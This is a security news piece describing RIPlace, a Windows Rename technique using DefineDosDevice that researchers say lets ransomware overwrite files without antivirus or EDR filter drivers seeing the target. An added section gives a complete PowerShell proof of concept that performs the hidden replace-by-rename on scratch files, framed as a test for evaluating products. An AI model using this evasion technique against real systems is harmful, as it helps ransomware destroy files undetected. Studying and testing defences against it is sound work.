A new ransomware technique can evade just about every detection method and remain invisible, researchers said.
RIPlace is a Windows file system technique that, when used to maliciously alter files, bypasses most existing anti-ransomware methods as well as other file system/data protections, said Nyotron’s Research team.
“In fact,” the researchers said, “all antivirus products tested so far were completely blind to file operations using this technique, including encryption. Moreover, even endpoint detection and response (EDR) products are blind to this technique and will not be visible for future incident response and investigation purposes.”
Most ransomware performs the following actions:
1. Open and read the original file
2. Encrypt the content in memory
3. Destroy the original file by:
• writing the encrypted content back into the original file
• OR saving the encrypted file to disk and removing the original with Delete (or a similar method)
• OR saving the encrypted file to disk, then renaming it over the original using Rename (Rename has an option to overwrite the target if it already exists on disk)
To be effective against ransomware, a filter driver (and the anti-ransomware or anti-malware product built on it) must cover all three of these methods.
Consider file replacement via Rename. Every time a Rename request is issued (specifically, an IRP_MJ_SET_INFORMATION request with FileInformationClass set to FileRenameInformation), the filter driver receives a callback in which it can inspect and filter the request.
If, before calling Rename, we call DefineDosDevice (a legacy function that creates an MS-DOS device name, implemented as a symbolic link in the object manager namespace), we can pass an arbitrary name as the device name and the original file's path as the target it points to. This way our device "XY" comes to refer to "C:\passwords.txt".
The RIPlace discovery is that, inside this callback, a filter driver fails to parse the destination path when it relies on the common routine FltGetDestinationFileNameInformation: the routine returns an error when handed a DosDevice path (rather than returning the post-processed path), yet the Rename call itself succeeds. A driver that gives up on inspecting the request when that call fails therefore never learns which file is being overwritten.
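As an added example (this is not Nyotron's RIPlace tool and not code from the article), the following PowerShell script runs the replace-by-Rename flow from the list above with the DefineDosDevice detour inserted before the rename, against two throwaway files under %TEMP%, so an analyst can check on a test VM whether an installed AV/EDR product blocks or at least logs the replacement. The device name RIPTEST, the scratch directory, the file contents and the use of a "\\.\<device>" destination string with MoveFileEx are assumptions made for the demo; the original page names the sequence but not these specifics.

```powershell
# Added test harness (not Nyotron's tool). Stage a file, point a DosDevice name
# at the victim file, then Rename the staged file over it through that name.
# Device name, scratch paths and file contents are made up for the demo.
$signature = @'
using System;
using System.Runtime.InteropServices;
public static class RiplaceNative {
    public const uint DDD_REMOVE_DEFINITION     = 0x2;
    public const uint MOVEFILE_REPLACE_EXISTING = 0x1;

    [DllImport("kernel32.dll", CharSet = CharSet.Unicode, SetLastError = true)]
    public static extern bool DefineDosDevice(uint flags, string deviceName, string targetPath);

    [DllImport("kernel32.dll", CharSet = CharSet.Unicode, SetLastError = true)]
    public static extern bool MoveFileEx(string existingName, string newName, uint flags);
}
'@
Add-Type -TypeDefinition $signature -ErrorAction Stop

function Get-LastWin32Message {
    # Marshal keeps the error code saved by the last SetLastError P/Invoke.
    $code = [Runtime.InteropServices.Marshal]::GetLastWin32Error()
    ([ComponentModel.Win32Exception]::new($code)).Message
}

$dir      = Join-Path $env:TEMP 'riplace-check'   # assumed scratch location
$original = Join-Path $dir 'original.txt'         # stands in for the victim file
$staged   = Join-Path $dir 'staged.bin'           # stands in for the encrypted copy
$device   = 'RIPTEST'                             # arbitrary DosDevice name

New-Item -ItemType Directory -Force -Path $dir | Out-Null
Set-Content -Path $original -Value 'plaintext'
[IO.File]::WriteAllBytes($staged, [byte[]](0xDE, 0xAD, 0xBE, 0xEF))

# Step 1: make \\.\RIPTEST resolve to the original file.
if (-not [RiplaceNative]::DefineDosDevice(0, $device, $original)) {
    throw "DefineDosDevice failed: $(Get-LastWin32Message)"
}
try {
    # Step 2: Rename the staged file over the original, naming the destination
    # through the device instead of its real path. This is the
    # IRP_MJ_SET_INFORMATION / FileRenameInformation request the filter sees.
    $destination = "\\.\$device"
    $renamed = [RiplaceNative]::MoveFileEx($staged, $destination,
                                           [RiplaceNative]::MOVEFILE_REPLACE_EXISTING)
    if (-not $renamed) {
        Write-Host "Rename blocked or failed: $(Get-LastWin32Message)"
    } else {
        # Verify on disk: original now holds the staged bytes, staged copy is gone.
        $bytes    = [IO.File]::ReadAllBytes($original)
        $replaced = ($bytes.Length -eq 4 -and $bytes[0] -eq 0xDE) -and -not (Test-Path $staged)
        Write-Host "Rename succeeded; original replaced on disk: $replaced"
        Write-Host "Now check the product's log for a rename whose target is $original."
    }
}
finally {
    # Remove the most recent mapping for the device name and clean up.
    [void][RiplaceNative]::DefineDosDevice([RiplaceNative]::DDD_REMOVE_DEFINITION, $device, $null)
    Remove-Item -Recurse -Force $dir -ErrorAction SilentlyContinue
}
```

Run it only on a disposable test machine with the product under evaluation installed. A product that handles the DosDevice form correctly either blocks the MoveFileEx call or records a rename whose destination resolves to original.txt; a product that is blind in the way the researchers describe lets the replacement through and shows no rename targeting that file, even though the bytes on disk have changed.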
“Using this technique, it is possible to maliciously encrypt file and bypass antivirus/anti-ransomware products that do not properly handle IRP_MJ_SET_INFORMATION callback,” the Nyotron researchers said in a post. “We believe malicious actors may abuse this technique in order to bypass security products that rely on FltGetDestinationFileNameInformation routine as well as avoid any recording of such activity by EDR products.”